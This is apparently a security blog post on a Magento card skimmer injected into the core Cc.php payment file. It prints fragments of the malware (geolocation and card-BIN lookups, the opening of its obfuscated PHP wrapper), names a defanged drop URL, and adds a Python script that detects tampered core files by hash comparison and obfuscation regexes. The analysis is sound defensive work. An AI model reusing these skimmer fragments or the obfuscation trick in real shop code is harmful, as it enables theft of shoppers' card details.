The Magento Shoplift vulnerability was patched about a year ago, and all this time we have been cleaning various Magento infections that steal customer credit card details, either via server-level code or via JavaScript injected into order pages.
Modifications of the app/code/core/Mage/Payment/Model/Method/Cc.php file are among the most popular. Here are some typical examples that we wrote about:
Recently we found one more modification of this malware. The code is almost identical. The main changes are the use of online services to retrieve geolocation data based on the victim's IP address:
$dip = json_decode(file_get_contents("http://ip-api.com/json/".$ip.""));
$country = $dip->country;
and the bank data based on the credit card number:
$bin = substr($binx, 0, 6);
$getbank = json_decode(file_get_contents("http://www.binlist.net/json/".$bin.""));
$ccbrand = $getbank->brand;
$ccbank = $getbank->bank;
$cctype = $getbank->card_type;
plus a new remote address where they send the stolen data to: hxxps://www.herdamultimedia[.]com/resulta.php, which also seems to be a hacked site.
The most interesting thing about this malware is that not only did it inject the malicious code into Cc.php but also encrypted the whole file content so that it looks like one long line of code:
<?php /* Mr-GanDrunX - Hiddenymouz - HiddenCode */ error_reporting(0); define('__LOCALFILE__',__FILE__); goto HIDDEN; function gandrunx(){ preg_replace("/.*/e",strrev("x3Bx29x29x29'=Q.....
This encryption is mainly used by Indonesian hackers.
Why did they encrypt the file? Probably to avoid detection when people search for the malware patterns that we reported before. However, it's actually not a very bright idea. Many malware scanners will detect the suspicious encryption anyway. Plus, it is very easy to find if you compare the files to the canonical Magento files.
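As an added example (not code from the original post or from any Sucuri tool), the following Python script performs the comparison suggested above: it hashes a pristine Magento tree against the installed one, lists modified, added and missing files, and checks each modified file for the obfuscation markers visible in the sample (error_reporting(0) followed by goto, preg_replace with the /e modifier, strrev). The file contents, the unknown.php name and the pristine Cc.php stand-in in demo() are constructed for the example.

```python
import hashlib
import os
import re
import tempfile
from pathlib import Path

# Markers visible at the top of the obfuscated Cc.php described in the post.
MARKERS = {
    "silence+goto": re.compile(r"error_reporting\(0\)\s*;.*?\bgoto\s+\w+", re.S),
    "preg_replace /e": re.compile(r"preg_replace\s*\(\s*[\"']/.*?/\w*e\w*[\"']"),  # /e runs the replacement as PHP
    "strrev": re.compile(r"\bstrrev\s*\("),
}
CC_PATH = os.path.join("app", "code", "core", "Mage", "Payment", "Model", "Method", "Cc.php")

def sha256_tree(root):
    """Map each file path (relative to root) to the SHA-256 of its content."""
    digests = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            digests[os.path.relpath(full, root)] = hashlib.sha256(Path(full).read_bytes()).hexdigest()
    return digests

def compare_trees(canonical, installed):
    """Sorted (modified, added, missing) paths of the installed tree versus the pristine one."""
    ref, cur = sha256_tree(canonical), sha256_tree(installed)
    return (sorted(p for p in ref if p in cur and ref[p] != cur[p]),
            sorted(p for p in cur if p not in ref),
            sorted(p for p in ref if p not in cur))

def obfuscation_hits(text):
    """Names of the obfuscation markers present in one PHP file's text."""
    return [name for name, rx in MARKERS.items() if rx.search(text)]

def _write(root, rel, text):
    Path(root, rel).parent.mkdir(parents=True, exist_ok=True)
    Path(root, rel).write_text(text)

def demo():
    """Constructed sample: a pristine tree versus an install whose Cc.php was replaced."""
    infected = ("<?php error_reporting(0); define('__LOCALFILE__',__FILE__); goto HIDDEN; "
                'function gandrunx(){ preg_replace("/.*/e",strrev("...")); } HIDDEN: echo 1;')
    with tempfile.TemporaryDirectory() as canonical, tempfile.TemporaryDirectory() as installed:
        _write(canonical, CC_PATH, "<?php\nclass Mage_Payment_Model_Method_Cc {}\n")  # stand-in, not the real file
        _write(installed, CC_PATH, infected)
        _write(installed, os.path.join("app", "unknown.php"), "<?php // file absent from the pristine tree\n")
        modified, added, missing = compare_trees(canonical, installed)
        hits = {p: obfuscation_hits(Path(installed, p).read_text()) for p in modified}
    return modified, added, missing, hits
```

Run against a real installation, replace the two temporary trees in demo() with the path of a freshly downloaded Magento release of the same version and the path of the live site; every file reported as modified or added in app/code/core deserves a look.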
If you see modified core Magento files, don't try to identify and remove the malicious code; just replace them with the original ones. And don't forget to update/patch Magento, check whether there are any malicious administrator users, and scan your server for backdoors that hackers might have left there. Or let Sucuri take care of your site.